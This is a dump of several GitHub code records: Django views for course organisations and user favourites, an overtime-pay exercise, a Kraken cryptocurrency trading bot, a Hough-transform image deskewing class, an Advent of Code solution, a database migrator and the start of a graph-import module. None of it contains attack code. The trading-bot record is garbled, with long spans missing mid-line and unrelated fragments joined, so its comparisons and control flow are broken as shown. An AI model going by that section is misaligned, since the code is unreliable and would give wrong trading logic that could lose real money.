CourseOrg.objects.filter(id=int(org_id)).first()\n all_courses = course_org.course_set.all()[:3]\n all_teachers = course_org.teacher_set.all()[:1]\n has_fav = False\n print(request.user)\n if request.user.is_authenticated():\n if UserFavorite.objects.filter(user=request.user, fav_id=course_org.id, fav_type=2):\n has_fav = True\n return render(request, 'org-homepage.html', {\n 'all_courses':all_courses,\n 'all_teachers': 
all_teachers,\n 'course_org':course_org,\n 'current_page':current_page,\n 'has_fav':has_fav,\n })\n\n\nclass OrgCourseView(View):\n \"\"\"\n 课程机构列表页\n \"\"\"\n\n def get(self, request, org_id):\n current_page = \"course\"\n course_org = CourseOrg.objects.filter(id=int(org_id)).first()\n all_courses = course_org.course_set.all()[:3]\n all_teachers = course_org.teacher_set.all()[:1]\n has_fav = False\n if request.user.is_authenticated():\n if UserFavorite.objects.filter(user=request.user, fav_id=course_org.id, fav_type=2):\n has_fav = True\n return render(request, 'org-detail-course.html', {\n 'all_courses': all_courses,\n 'all_teachers': all_teachers,\n 'course_org': course_org,\n 'current_page': current_page,\n 'has_fav':has_fav\n })\n\n\nclass OrgDescView(View):\n\n def get(self, request, org_id):\n current_page = \"desc\"\n course_org = CourseOrg.objects.filter(id=int(org_id)).first()\n all_courses = course_org.course_set.all()[:3]\n all_teachers = course_org.teacher_set.all()[:1]\n has_fav = False\n if request.user.is_authenticated():\n if UserFavorite.objects.filter(user=request.user, fav_id=course_org.id, fav_type=2):\n has_fav = True\n return render(request, 'org-detail-desc.html', {\n 'all_courses': all_courses,\n 'all_teachers': all_teachers,\n 'course_org': course_org,\n 'current_page': current_page,\n 'has_fav':has_fav,\n })\n\n\nclass OrgTeacherView(View):\n def get(self, request, org_id):\n current_page = \"teacher\"\n course_org = CourseOrg.objects.filter(id=int(org_id)).first()\n has_fav = False\n if request.user.is_authenticated():\n if UserFavorite.objects.filter(user=request.user, fav_id=course_org.id, fav_type=2):\n has_fav = True\n all_courses = course_org.course_set.all()[:3]\n all_teachers = course_org.teacher_set.all()[:1]\n return render(request, 'org-detail-teachers.html', {\n 'all_courses': all_courses,\n 'all_teachers': all_teachers,\n 'course_org': course_org,\n 'current_page': current_page,\n 'has_fav':has_fav,\n })\n\n\nclass OrgFavView(View):\n \"\"\"用户收藏\"\"\"\n def post(self, request):\n fav_id = request.POST.get('fav_id', 0)\n fav_type = request.POST.get('fav_type', 0)\n\n if not request.user.is_authenticated():\n #判断用户登录状态\n print(request.user)\n return HttpResponse('{\"status\":\"fail\", \"msg\":\"用户未登录\"}', content_type='application/json')\n\n\n exist_records = UserFavorite.objects.filter(user=request.user, fav_id=int(fav_id), fav_type=int(fav_type))\n if exist_records:\n #如果记录已经存在, 则表示用户取消收藏\n exist_records.delete()\n if int(fav_type) == 1:\n course = Course.objects.get(id=int(fav_id))\n course.fav_nums -= 1\n if course.fav_nums < 0:\n course.fav_nums = 0\n course.save()\n elif int(fav_type) == 2:\n course_org = CourseOrg.objects.get(id=int(fav_id))\n course_org.fav_nums -= 1\n if course_org.fav_nums < 0:\n course_org.fav_nums = 0\n course_org.save()\n elif int(fav_type) == 3:\n teacher = Teacher.objects.get(id=int(fav_id))\n teacher.fav_nums -= 1\n if teacher.fav_nums < 0:\n teacher.fav_nums = 0\n teacher.save()\n return HttpResponse('{\"status\":\"success\", \"msg\":\"收藏\"}', content_type='application/json')\n else:\n user_fav = UserFavorite()\n if int(fav_id) > 0 and int(fav_type) > 0:\n user_fav.user = request.user\n user_fav.fav_id = int(fav_id)\n user_fav.fav_type = int(fav_type)\n user_fav.save()\n\n if int(fav_type) == 1:\n course = Course.objects.get(id=int(fav_id))\n course.fav_nums += 1\n course.save()\n elif int(fav_type) == 2:\n course_org = CourseOrg.objects.get(id=int(fav_id))\n course_org.fav_nums += 1\n course_org.save()\n elif 
int(fav_type) == 3:\n                    teacher = Teacher.objects.get(id=int(fav_id))\n                    teacher.fav_nums += 1\n                    teacher.save()\n\n                return HttpResponse('{\"status\":\"success\", \"msg\":\"已收藏\"}', content_type='application/json')\n            else:\n                return HttpResponse('{\"status\":\"fail\", \"msg\":\"收藏出错\"}', content_type='application/json')\n\n\n\n\n","repo_name":"bulangdaoshi/lunix-","sub_path":"MXZX/app/Organization/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21255708194","text":"def computepay(hoursworked, payrate):\r\n    #Variables\r\n    totalpay = 0\r\n    regularhours = 0\r\n    overtimehours = 0\r\n    regulartimelimit = 40\r\n    regularpay = 0\r\n    overtimepay = 0\r\n    time_half = 1.5\r\n    \r\n    \r\n    #If statement\r\n    if hoursworked > regulartimelimit:\r\n        regularhours = regulartimelimit\r\n        overtimehours = hoursworked - regulartimelimit\r\n    \r\n    else:\r\n        regularhours = hoursworked\r\n        overtimehours = 0\r\n    \r\n    regularpay = regularhours * payrate\r\n    overtimepay = overtimehours * payrate * time_half\r\n    \r\n    totalpay = regularpay + overtimepay\r\n    return totalpay\r\n
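#Expected result for the call below: 40*20 + 12*20*1.5 = 1160.0\r\n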
#Calling the function\r\nprint (computepay(52, 20))\r\n ","repo_name":"Definitive-edition/Programming-for-IT-Problem-set-3","sub_path":"Exercise 6.py","file_name":"Exercise 6.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12282658960","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jul 31 22:54:47 2017\n\n@author: dboudeau\n\"\"\"\nimport exchange_krakken as kraken\nimport time,os\nimport persistenceHandler\nimport logging\nimport businessLogic\nimport notifier\nimport math\n\n\n# TODO Create proper trader/closed-order classes, because right now this is a pure mess\n# TODO Unify the different methods that fetch open and closed orders; there are plenty of them and it serves no purpose\n# TODO IF A SELL ORDER IS MISSING, IT MUST BE HANDLED! See the unclosed-trade query\n# TODO Every call for open or closed orders should trigger an update of the close table\n\n# Var initialization\nAUTHORIZATION_OF_BUYING=bool(os.environ['AUTHORIZATION_OF_BUYING']=='True')\n# XRP -> XXRPZEUR LTC -> XLTCZEUR ETC -> XETCZEUR\nCURRENCY_CRAWLED_NAME=os.environ['CURRENCY_CRAWLED_NAME']\n# XRP -> XRPEUR LTC -> LTCEUR ETC -> ETCEUR\nCURRENCY_ORDER_NAME=os.environ['CURRENCY_ORDER_NAME']\n# XRP -> XXRP LTC -> XLTC ETC -> XETC\nCURRENCY_BALANCE_NAME=os.environ['CURRENCY_BALANCE_NAME']\n\nNOTIFY_ON_CLOSED_ORDERS=bool(os.environ['NOTIFY_ON_CLOSED_ORDERS']=='True')\n\n# Logging Management\nlogger = logging.getLogger(__name__)\nhandler = logging.StreamHandler()\nformatter = logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s')\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\nlogger.setLevel(logging.DEBUG)\n\n\nkraken.init()\nlist_open_orders=kraken.get_single_open_orders(CURRENCY_ORDER_NAME)\nDONE=0\nNOT_DONE=1\n\n####################\n# Initialize traders\nWAITING='wait'\nSELLING='sell'\nBUYING='buy'\nCLOSED='closed'\nCANCELED='canceled'\n\nsequence_number=-1\ndef increment_sequence():\n    global sequence_number\n    sequence_number=sequence_number+1\n    return sequence_number\n\n##############################################################\n# TRADING SETUP \n##############################################################\nALLOWED_BUDGET=float(os.environ['ALLOWED_BUDGET'])\nEXPECTED_BENEFIT_BY_TRADER=float(os.environ['EXPECTED_BENEFIT_BY_TRADER'])\nNB_OF_TRADERS=int(os.environ['NB_OF_TRADERS'])\nSTEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE=float(os.environ['STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE'])\nMIN_BUYING_PRICE=float(os.environ['MIN_BUYING_PRICE'])\nMAX_BUYING_PRICE=float(os.environ['MAX_BUYING_PRICE'])\n\nBUDGET_BY_TRADER_LIST=os.environ['BUDGET_BY_TRADER_LIST']\ntemp=BUDGET_BY_TRADER_LIST.split(',')\nBUDGET_BY_TRADER_LIST = []\nfor item in temp:\n    BUDGET_BY_TRADER_LIST.append(float(item))\n\nlist_trader=[]\nbuying_price=MAX_BUYING_PRICE\nfor index in range(0,NB_OF_TRADERS):\n    # trader: (integerId, budget(€), buy_unit_price, buying_order, status, available_budget, engaged_budget)\n    list_trader.append([increment_sequence(),BUDGET_BY_TRADER_LIST[index],buying_price,None,WAITING,0.0,0.0])\n    buying_price=round(buying_price-STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE,1)\nif(list_trader[NB_OF_TRADERS-1][2]!=MIN_BUYING_PRICE):\n    logger.error(\"Something wrong in configuration, minimum buying price (\"+str(MIN_BUYING_PRICE)+\") different from settings (\"+str(list_trader[NB_OF_TRADERS-1][2])+\")\")\n    exit(1)\n\n##################################################################\n# COMMON FUNCTIONS\n##################################################################\n\n\ndef safetyCheckOnTradingCurrencySellingOrder(open_orders,owned_volume_of_traded_money):\n    logger.info('On initialization or after a cancel order, check that there is no missing selling order')\n    sold_volume=0.0\n    for order in open_orders:\n        if(order.get('type')==SELLING):\n            sold_volume=sold_volume+order.get('vol')\n    if(abs(owned_volume_of_traded_money - (sold_volume+0.1))>=0.5):\n        \n        # Particular case: if a buying/selling order has been partially processed, the amount can be slightly different:\n        logger.info(\"88 Checking for partial orders \")\n        sum_buying_partial_selling=0.0\n        sum_buying_partial_buying=0.0\n        for item in open_orders:\n            if (item.get('vol_exec')>0.0):\n                if(item.get('type')==SELLING):\n                    logger.info(\"89-1 Adding \"+str(item.get('vol_exec'))+\" from SELLING order 
\"+item.get('order_id'))\n sum_buying_partial_selling=sum_buying_partial_selling+item.get('vol_exec')\n else:\n logger.info(\"89-2 Adding \"+str(item.get('vol_exec'))+\" from BUYING order \"+item.get('order_id'))\n sum_buying_partial_buying=sum_buying_partial_buying+item.get('vol_exec')\n \n logger.info(\" Sum partial BUYING order \"+str(sum_buying_partial_buying))\n logger.info(\" Sum partial SELLING order \"+str(sum_buying_partial_selling))\n logger.info(\" Sum of owned_volume_of_traded_money=\"+str(owned_volume_of_traded_money))\n logger.info(\" Sum of sold coins=\"+str(sold_volume))\n logger.info(\" Real sold =\"+str(sold_volume - sum_buying_partial_selling + sum_buying_partial_buying))\n \n \n if(abs(owned_volume_of_traded_money - (round( (sold_volume - sum_buying_partial_selling + sum_buying_partial_buying) ,1) ) )>=0.1):\n logger.info(CURRENCY_BALANCE_NAME+\" Sanity check error (Even with partial orders\")\n notifier.notify('Safety Check failed',CURRENCY_BALANCE_NAME+\" Sanity check error (Even with partial orders)\")\n exit(1)\n else:\n logger.info(CURRENCY_BALANCE_NAME+\" owned volume on exchange (\"+str(owned_volume_of_traded_money)+\") are all in sell mode (\"+str(round( (sold_volume - sum_buying_partial_selling + sum_buying_partial_buying) ,1))+\").Good to go.\")\n\n else:\n logger.info(CURRENCY_BALANCE_NAME+\" owned volume on exchange (\"+str(owned_volume_of_traded_money)+\") are all in sell mode (\"+str(sold_volume)+\").Good to go.\")\n \n # Checking number of open buying orders :\n counter_open_buying_order=0\n for open_order in open_orders:\n if(open_order.get('type')==BUYING):\n counter_open_buying_order=counter_open_buying_order+1\n \n # Test number of buying orders\n if(counter_open_buying_order>1):\n logger.error(\"More than 1 buying order detected\")\n notifier.notify(\"Fatal Error\",\"More than 1 buying order detected\"+str(open_order))\n logger.error(\"Exiting\")\n exit(1) \n \n\ndef calculatedEngagedMoney(volume,unit_sell_price,step_between_unit_sell_and_unit_price):\n buy_trade=volume * round(unit_sell_price-step_between_unit_sell_and_unit_price,2)\n fees=businessLogic.calculate_fee(volume * round(unit_sell_price-step_between_unit_sell_and_unit_price,2))\n engaged_money=math.ceil(buy_trade + fees)\n logger.info(\"Volume buyed was \"+str(volume) +\" at \"+str(round(unit_sell_price-step_between_unit_sell_and_unit_price,2) ))\n logger.info(\" fees were \"+str(fees) )\n logger.info(\" so (ceiled) engaged money was \"+str(float(round(buy_trade + fees,2))) )\n return float(engaged_money)\n\n# Ratio should be different\ndef budgetCalculation(list_trader,number_of_traders,logs=False):\n logger.info(\"------Begin calculating the budget for each trader before buying----\")\n available_budget=0\n for index in range(0,number_of_traders):\n # Define the ratio of the above(s) free traders which is allowed by below traders\n RATIO_OF_ABOVE_BUDGET_ALLOCATED=round((index+1)/number_of_traders,2)\n \n if(list_trader[index][4]==WAITING):\n list_trader[index][5]=round( (available_budget * RATIO_OF_ABOVE_BUDGET_ALLOCATED ) + list_trader[index][1] ,1)\n available_budget=available_budget+list_trader[index][1]\n else:\n list_trader[index][5]=0.0\n\n # Engaged money\n if(list_trader[index][6]>0 and list_trader[index][6]list_trader[index][2] and open_selling_order.get('price')<=round(list_trader[index][2]+STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE,2)):\n logger.info('Mapping order '+open_selling_order.get('order_id')+' - '+str(open_selling_order.get('price'))+' to trader 
'+str(list_trader[index][0]))\n logger.info('Trader '+str(index)+' ( '+str(list_trader[index][2])+' -> '+str(round(list_trader[index][2]+STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE,2))+')') \n is_order_mapped=True\n # Set up the trader with new status\n list_trader[index][3]=open_selling_order.get('order_id')\n list_trader[index][4]=SELLING\n list_trader[index][5]=0.0\n # Engaged money is selling volume*unit buy_price + fees\n list_trader[index][6]=calculatedEngagedMoney(open_selling_order.get('vol'),list_trader[index][2],STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE)\n if(is_order_mapped):\n break;\n if is_order_mapped==False:\n logger.info('Order '+open_selling_order.get('order_id')+' is NOT MAPPED')\n\n# Calculate budget for further tests\nlist_trader=budgetCalculation(list_trader,NB_OF_TRADERS,logs=True)\n\n\n# Check that budget available on exchange is compliant \ntest_required_budget=list_trader[NB_OF_TRADERS-1][5]\ntest_available_budget=kraken.get_balance_EUR()\n\nif(test_available_budget0):\n is_buying_order_canceled_and_partially_executed=True\n \n opening_date=str(coe.get('opentm'))\n closing_date=str(coe.get('closetm'))\n\n # Don't send notification and dont store cancel order\n if(status!=CANCELED or is_buying_order_canceled_and_partially_executed==True):\n # Notify\n if(NOTIFY_ON_CLOSED_ORDERS==True):\n specific_text=\"\"\n if(is_buying_order_canceled_and_partially_executed==True):\n specific_text=\"PARTIALLY EXECUTED CANCEL \"\n notifier.notify(specific_text+'Order '+oe.get('order_id')+' '+str.upper(status),descr)\n\n logger.info('Order '+oe.get('order_id')+' '+str.upper(status)+\" \"+descr)\n \n # If an BUY order was CLOSED( or CANCELED but partially processed), search the concerned speculator to create sell order\n if(oe.get('type')==BUYING or oe.get('type')==SELLING):\n logger.info(\"order \"+str(oe.get('order_id'))+\" just closed, searching trader\")\n for index in range(0,NB_OF_TRADERS):\n if(list_trader[index][4]==BUYING and list_trader[index][3]==oe.get('order_id') and (status==CLOSED or is_buying_order_canceled_and_partially_executed==True) ):\n logger.info(\"1/ \"+str(BUYING)+\" order \"+oe.get('order_id')+\" was originally created by trader \"+str(index)+\".\")\n if(is_buying_order_canceled_and_partially_executed==True):\n logger.info(\"- Specific case of selling order creation after cancelation of partially executed buying order\")\n ########################\n # CREATING SELLING ORDER\n ########################\n # Get available amount of currency\n volume_buyed_to_sell=kraken.get_closed_order_volume_by_id(oe.get('order_id'),persistenceHandler,STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE)\n logger.info(\"Volume to sell is :\"+str(volume_buyed_to_sell))\n if(volume_buyed_to_sell>0.0):\n unit_selling_price=round(list_trader[index][2]+STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE,2)\n logger.info(\"Unit sell price is:\"+str(unit_selling_price))\n # Selling order: secure_sell(volume,price,currency_crawling_name,persistenceHandler,current_step_between_buy_and_sell,CURRENCY_ORDER_NAME)\n created_selling_order=kraken.secure_sell(volume_buyed_to_sell,unit_selling_price,CURRENCY_CRAWLED_NAME,persistenceHandler,STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE,CURRENCY_ORDER_NAME)\n fresh_open_orders.append(created_selling_order)\n list_trader[index][3]=created_selling_order.get('order_id')\n list_trader[index][4]=SELLING\n list_trader[index][5]=0.0\n # Setting engaged money\n list_trader[index][6]=calculatedEngagedMoney(volume_buyed_to_sell,unit_selling_price,STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE)\n 
logger.info(\"Trader \"+str(list_trader[index][0])+\" is now in mode\"+str(list_trader[index][4])+\" with order \"+str(list_trader[index][3])+\". Budget is :\"+str(list_trader[index][5]))\n break;\n if(list_trader[index][3]==oe.get('order_id') and ((list_trader[index][4]==SELLING) or ((list_trader[index][4]==BUYING) and (status==CANCELED)))):\n logger.info(\"2/ \"+str(list_trader[index][4])+\" order \"+oe.get('order_id')+\" was originally created by trader \"+str(index)+\".\")\n ####################################################\n # MANAGE SELL ENJOYMENT, OR BUY CANCELATION\n ####################################################\n flag_benefit=False\n if(list_trader[index][4]==SELLING):\n flag_benefit=True\n \n list_trader[index][3]=None\n list_trader[index][4]=WAITING\n # Budget will be calculated in the iteration\n list_trader[index][5]=0.0\n list_trader[index][6]=0.0\n logger.info(\"Trader \"+str(list_trader[index][0])+\" is now in mode\"+str(WAITING))\n \n # Special notification if to give you benefits\n if(flag_benefit):\n try:\n benefits=businessLogic.estimate_benefits(list_trader[index][2],volume,round(list_trader[index][2]+STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE,2))\n todays_benefits=businessLogic.calculate_today_benefits(persistenceHandler.get_todays_benefits())\n logger.info(\"Todays Benefits are \"+str(todays_benefits))\n notifier.notify(\";) Congrats\",\"If configuration did t change, Benefits are little bit under \"+str(benefits)+\"€\\nTotal for today :\"+str(todays_benefits[1])+\"€ (in \"+str(todays_benefits[0])+\" trades)\")\n logger.info(\"CONGRATULATIONS !!! Benefits are little bit under \"+str(benefits)+\"€\")\n logger.info(\"---------------------Total for today-> \"+str(todays_benefits[1])+\"€ (\"+str(todays_benefits[0])+\" trades)\")\n except Exception as e:\n logger.info(\"fail to send Special notification for benefit. 
error was \"+str(e))\n break;\n\n # Finally setup open order to freshest list\n list_open_orders=fresh_open_orders\n time.sleep(15)\n\n \n if(DO_STEP2==True):\n \n # Safety check (only if owned_value > 0 (if =-1 it means that it change during time when we get open orders))\n if(owned_volume>0.0):\n safetyCheckOnTradingCurrencySellingOrder(list_open_orders,owned_volume)\n else:\n logger.info(\"Safety check is not going to be performed ( owned_volume=\"+str(owned_volume)+\")\")\n \n ##########################\n # Traders\n ##########################\n CAN_LAUNCH_BUYING_ORDER=False\n CURRENT_BUYING_ORDER_ID=-1\n # Check if a trader is buying, else set up to buy\n EXISTS_OPEN_BUYING_ORDERS=False\n BUYING_TRADER_ID=-1\n for index in range(0,NB_OF_TRADERS):\n if list_trader[index][4]==BUYING:\n EXISTS_OPEN_BUYING_ORDERS=True\n BUYING_TRADER_ID=list_trader[index][0]\n CURRENT_BUYING_ORDER_ID=list_trader[index][3]\n \n # Get trading informations only if no other speculators are buying\n IS_TREND_GROWING=False\n if(EXISTS_OPEN_BUYING_ORDERS==False):\n df2=persistenceHandler.get_Trends_time_series(kraken_time,CURRENCY_CRAWLED_NAME,2)\n df5=persistenceHandler.get_Trends_time_series(kraken_time,CURRENCY_CRAWLED_NAME,5)\n df10=persistenceHandler.get_Trends_time_series(kraken_time,CURRENCY_CRAWLED_NAME,10)\n # I take 16 mins to be sure having at least 14.5 mins\n df15=persistenceHandler.get_Trends_time_series(kraken_time,CURRENCY_CRAWLED_NAME,16)\n \n trends2_is_growing=businessLogic.it_market_increasing(df2)\n trends5_is_growing=businessLogic.it_market_increasing(df5)\n trends10_is_growing=businessLogic.it_market_increasing(df10)\n trends15_is_growing=businessLogic.it_market_increasing(df15)\n \n delay_covered=(max(df15.index) - min(df15.index)).seconds\n logger.info('Covered delay = '+str(round( (delay_covered/60) ,2))+' mins / Trend data: (T2:'+str(len(df2))+' elems),(T5:'+str(len(df5))+' elems),(T10:'+str(len(df10))+' elems),(T15='+str(len(df15))+' elems)')\n \n # Checking if trend is reliable\n if(len(df2)>2 and len(df5)>5 and len(df10)>10 and len(df15)>15 and (delay_covered/60.0)>=14.5):\n if(trends2_is_growing and trends5_is_growing and trends10_is_growing and trends15_is_growing):\n # Checking that trends number is enough:\n logger.info(\"Market is good right now \")\n IS_TREND_GROWING=True\n else:\n logger.info(\"Market is not good at this time \")\n else:\n logger.warn(\"Number of data for trends is not reliable\")\n \n # If market is growing and no one is buying, check bugdet\n if(IS_TREND_GROWING==True and EXISTS_OPEN_BUYING_ORDERS==False):\n logger.info(\"Market is OK, and no buying orders open : time to shop a little bit ! 
\")\n # calculate budget, get the right trader and launch buying\n list_trader=budgetCalculation(list_trader,NB_OF_TRADERS,logs=True)\n \n #Check if the speculator has right to buy:\n if AUTHORIZATION_OF_BUYING==True and currency_actual_ask_price>=MIN_BUYING_PRICE:\n logger.info(\"Remember : Speculator is allowed to trade\")\n # /!\\ check from lowest trader to higher trader is essential\n SELECTED_TRADER_ID_FOR_BUYING=-1\n for index in range(NB_OF_TRADERS-1,-1,-1):\n # If trader's buy price is higher than value price we have the right trader\n if(list_trader[index][2]>=currency_actual_ask_price):\n # index of selected trader is index+1 (lower )\n ###################\n # SET BUYING ORDER\n ##################\n SELECTED_TRADER_ID_FOR_BUYING=index+1\n # Checking it trader is available:\n if(list_trader[SELECTED_TRADER_ID_FOR_BUYING][4]==WAITING):\n # Calculate volume to buy\n volume_to_buy=businessLogic.get_maximum_volume_to_buy_with_budget( round( list_trader[SELECTED_TRADER_ID_FOR_BUYING][5],2),list_trader[SELECTED_TRADER_ID_FOR_BUYING][2] )\n logger.info(\"Trader \"+str(SELECTED_TRADER_ID_FOR_BUYING)+' was selected to buy at '+str(list_trader[SELECTED_TRADER_ID_FOR_BUYING][2])+\" because market price is \"+str(currency_actual_ask_price))\n logger.info(\" budget is going to be \"+str(list_trader[SELECTED_TRADER_ID_FOR_BUYING][5])+\"€\")\n logger.info(\" buying volume :\"+str(volume_to_buy))\n logger.info(\" For further analysis, unix time is \"+str(kraken_time))\n \n # create buying order\n created_buying_order=kraken.secure_buy(volume_to_buy,list_trader[SELECTED_TRADER_ID_FOR_BUYING][2],CURRENCY_CRAWLED_NAME,persistenceHandler,STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE,CURRENCY_ORDER_NAME)\n logger.info(\"Buying order \"+created_buying_order.get('order_id')+\" was created\")\n list_open_orders.append(created_buying_order)\n # /!\\set up right status and cut budget setup selling order \n list_trader[SELECTED_TRADER_ID_FOR_BUYING][3]=created_buying_order.get('order_id')\n list_trader[SELECTED_TRADER_ID_FOR_BUYING][4]=BUYING\n list_trader[SELECTED_TRADER_ID_FOR_BUYING][5]=0.0\n # setup buying mode to avoir other buy attempt\n EXISTS_OPEN_BUYING_ORDERS=True\n else:\n logger.info(\"Speculator wanted with trader \"+str(SELECTED_TRADER_ID_FOR_BUYING)+\" is already in \"+str(list_trader[SELECTED_TRADER_ID_FOR_BUYING][4])+\" mode\")\n break;\n else:\n logger.info(\"Speculator is actually in mode AUTHORIZATION_OF_BUYING==False\")\n else:\n if(EXISTS_OPEN_BUYING_ORDERS==True):\n # On ne verifie pas l'ordre du top trader (on ne peut rien faire de toute manière)\n if(BUYING_TRADER_ID>0):\n logger.info(\"Check if Trader \"+str(BUYING_TRADER_ID)+\" buying order has still potential to reach \")\n # check if order is ok\n buying_trader=list_trader[BUYING_TRADER_ID]\n upper_buying_trader=list_trader[BUYING_TRADER_ID-1]\n if(buying_trader[0]==BUYING_TRADER_ID and upper_buying_trader[0]==BUYING_TRADER_ID-1):\n # Control is : market price has to be - upper or equals to buyer unit price\n if(buying_trader[2]<= currency_actual_ask_price and currency_actual_ask_price max_variance:\n max_variance = variance\n target_shift = shift\n\n if shift % 300 == 0 and shift != -MAX_SHIFT:\n plt.clf()\n plt.plot(np.arange(-MAX_SHIFT, shift + 1), variances)\n plt.savefig('out/variances.png')\n\n print(f\"Finished calculating, optimal shift is {target_shift}\")\n sys.setrecursionlimit(old_recursion_limit)\n\n return img_tools.rotate_by_shift(\n self.source, target_shift, \n img_tools.InterpolationType.BILINEAR\n )\n\n def 
_get_brightness_variance(self, shift):\n line_brightness = []\n N, M = self._img.shape \n for x in range(min(-shift, 0), max(N - shift, N) + 1):\n stats = self._brightness_statistics(x, 0, shift, M)\n if stats[1] != 0:\n line_brightness.append(stats[0] / stats[1])\n return np.var(line_brightness) if line_brightness else 0\n\n @lru_cache(10**8)\n def _brightness_statistics(self, x, y, shift_x, shift_y):\n \"\"\"\n returns (brightness sum, amount of featured cells)\n of cells from to not inclusive\n \"\"\"\n\n sign = lambda x: 1 if x >= 0 else -1\n if not img_tools.contains_coordinates(self._img, x, y) and \\\n not img_tools.contains_coordinates(self._img, x + shift_x - sign(shift_x), y + shift_y - 1):\n return np.array([0, 0]) \n \n if abs(shift_x) <= 1:\n res = np.zeros(2)\n for y_i in range(y, y + shift_y):\n if img_tools.contains_coordinates(self._img, x, y_i):\n res += np.array([self._img[x][y_i], 1])\n return res\n\n shift_x2 = sign(shift_x) * (abs(shift_x) // 2)\n shift_y2 = shift_y // 2\n return self._brightness_statistics(x, y, shift_x2, shift_y2) +\\\n self._brightness_statistics(x + shift_x2, y + shift_y2, shift_x - shift_x2, shift_y - shift_y2)","repo_name":"Moysenko/ABBYY_CV","sub_path":"Homework_3/fht.py","file_name":"fht.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74927007452","text":"def score_round(text: str) -> int:\n legend = {\n \"A\": \"Rock\",\n \"B\": \"Paper\",\n \"C\": \"Scissors\",\n \"X\": \"Rock\",\n \"Y\": \"Paper\",\n \"Z\": \"Scissors\",\n }\n wins = {\"Rock\": \"Scissors\", \"Paper\": \"Rock\", \"Scissors\": \"Paper\"}\n choices = {\"Rock\": 1, \"Paper\": 2, \"Scissors\": 3}\n opp, me = text.split(\" \")\n conv_opp, conv_me = legend[opp], legend[me]\n score = choices[conv_me]\n if wins[conv_opp] == conv_me:\n pass\n elif conv_opp == conv_me:\n score += 3\n elif wins[conv_me] == conv_opp:\n score += 6\n return score\n\n\ndef score_game(text: str) -> int:\n score = 0\n for cur_round in text.split(\"\\n\"):\n score += score_round(cur_round)\n return score\n\n\ndef part_1():\n # tests\n with open(\"2_test.txt\", \"r\") as f:\n data = f.read()\n assert score_game(data) == 15\n\n # input\n with open(\"2_input.txt\", \"r\") as f:\n data = f.read()\n print(score_game(data))\n\n\ndef score_round_part2(text: str) -> int:\n legend = {\"A\": \"Rock\", \"B\": \"Paper\", \"C\": \"Scissors\"}\n wins = {\"Rock\": \"Scissors\", \"Paper\": \"Rock\", \"Scissors\": \"Paper\"}\n losses = {v: k for k, v in wins.items()}\n choices = {\"Rock\": 1, \"Paper\": 2, \"Scissors\": 3}\n opp, me = text.split(\" \")\n conv_opp = legend[opp]\n score = 0\n if me == \"X\":\n score += choices[wins[conv_opp]]\n elif me == \"Y\":\n score += choices[conv_opp] + 3\n elif me == \"Z\":\n score += choices[losses[conv_opp]] + 6\n return score\n\n\ndef score_second_game(text: str) -> int:\n score = 0\n for cur_round in text.split(\"\\n\"):\n score += score_round_part2(cur_round)\n return score\n\n\ndef part_2():\n # tests\n with open(\"2_test.txt\", \"r\") as f:\n data = f.read()\n assert score_second_game(data) == 12\n\n # input\n with open(\"2_input.txt\", \"r\") as f:\n data = f.read()\n print(score_second_game(data))\n\n\npart_1()\npart_2()\n","repo_name":"grahampicard/advent-of-code-2022","sub_path":"2/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} 
+{"seq_id":"41812236353","text":"import importlib\n\n\nclass Migrator:\n\tVERSION = None\n\n\tdef __init__(self, db):\n\t\t\"\"\"\n\t\tInitiate migrator class.\n\n\t\t:param db: Database instance\n\t\t:type db: layblr.database.db.Database\n\t\t\"\"\"\n\t\tself.db = db\n\t\tself.connection = db.connection\n\n\tasync def up(self):\n\t\t\"\"\"\n\t\tMigrate the schema to the new version.\n\t\t\"\"\"\n\t\traise NotImplementedError\n\n\tasync def down(self):\n\t\t\"\"\"\n\t\tMigrate down to the older version (undo changes). Optional but recommended.\n\t\t:return:\n\t\t\"\"\"\n\t\traise Exception('No down migration')\n\n\ndef get_migration_versions():\n\t\"\"\"\n\tScan folder for migration versions and return the version classes.\n\n\t:return: Version migrator classses.\n\t\"\"\"\n\tfrom layblr.database.migration import versions\n\treturn versions\n\n\ndef get_latest_version():\n\t\"\"\"\n\tGet latest version.\n\n\t:return: Latest version number\n\t\"\"\"\n\tversions = get_migration_versions()\n\treturn int(versions[len(versions) - 1])\n\n\ndef get_version_class(version):\n\t\"\"\"\n\tImport and return class of the given integer version.\n\t:param version: Version integer.\n\t:return: Class of the migration version.\n\t\"\"\"\n\tversion_string = '{0:03d}'.format(version)\n\tmodule_name = 'v{}'.format(version_string)\n\tversion_class = 'Version{}'.format(version_string)\n\n\tmodule = importlib.import_module('layblr.database.migration.{}'.format(module_name))\n\treturn getattr(module, version_class)\n","repo_name":"layblr/layblr","sub_path":"layblr/database/migrator.py","file_name":"migrator.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"41597447839","text":"import json\nfrom typing import Union\nfrom typing import List, Dict, Tuple, Type\nfrom py2neo import Graph\nfrom neo4j import Driver\n\nfrom graphio import NodeSet, RelationshipSet\nfrom dict2graph.node import Node\nfrom dict2graph.relation import Relation\nfrom 